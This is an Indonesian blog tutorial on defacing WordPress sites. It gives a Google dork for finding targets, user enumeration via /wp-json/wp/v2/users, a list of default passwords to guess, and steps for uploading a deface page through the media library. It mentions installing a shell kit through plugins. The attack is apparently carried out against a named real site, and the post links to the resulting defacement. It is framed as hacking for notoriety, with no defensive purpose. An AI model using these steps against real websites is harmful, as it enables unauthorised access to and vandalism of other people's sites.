Beranda
Tutorial

☣ Cara Deface Web Worldpress

Tanya degurechaff
Assalamualaikum balik lagi sama gw NO NAME 001 disni gw mau ngasih tutorial cara nya depes wordpress lansung saja langkah pertama 

Bahan bahan 
intitle:/wordpress "hello world" site:in
exploit: wp-login.php
User : user 
Pw : admin

admin
admin

user
user

admin
admin12345

admin
1234 

admin
123456
Ini contoh buat password wordpress
Untuk mencari username website itu kalian simak ya
Kalian kasih Exploit : /wp-json
https://soowgood.co.uk/wp-json
Untuk usernamenya kita sudah menemukan yaitu "admin"
https://soowgood.co.uk/wp-json/wp/v2/users
Ini untuk mencari username wordpress 
Exploit : wp-json/wp/v2/users
Oke kita mari testing terlebih dahulu untuk usernamenya
Nah usernamenya udah benar ya "admin" oke bagian selanjutnya kita harus bsa menebak password sebisa mungkin
User : user 
Pw : admin


admin
admin

user
user


admin
admin12345


admin
1234 


admin
123456


admin
adminadmin


admin
adminadmin123
Oke masuk ya ternyata password-nya yaitu "adminadmin"
Yang saya lingkari itu kamu kalian titik 3 itu ya kita cek dulu bagian plugins  yang saya kasih tanda panah kalau semisal ada add plugins and install plugins.. 70%/100% kita bisa posting Shell kit atau deface kita
Karena ini gak ada bagian "add plugins" tetapi kita ini pengen banget gitu buat jadi hacker atau nama kita ada google index bisa aja
Kalian klik titik 3 di atas dan lalu ilih media
Nanti disana ada "add file media"
Disini kita upload SC deface kalian yang saya coret
Tapi yang kamu harus tau yaitu dengan nama file nya kayak gini 

h.txt
atau
index.html 
Karena ini tidak bisa upload 

php
Udah ke upload ya nama file saya adalh
index.html
Dan sudah deh done terimakasih 
© Asep-IT 
Link : https://soowgood.co.uk/wp-content/uploads/2024/10/index.html
Source:Materi oleh asep IT di komunitas kami ,mari gabung komunitas kami agar kalian menambah wawasan 
Sekian Terimakasih 

Posting Komentar

Komentar yang sopan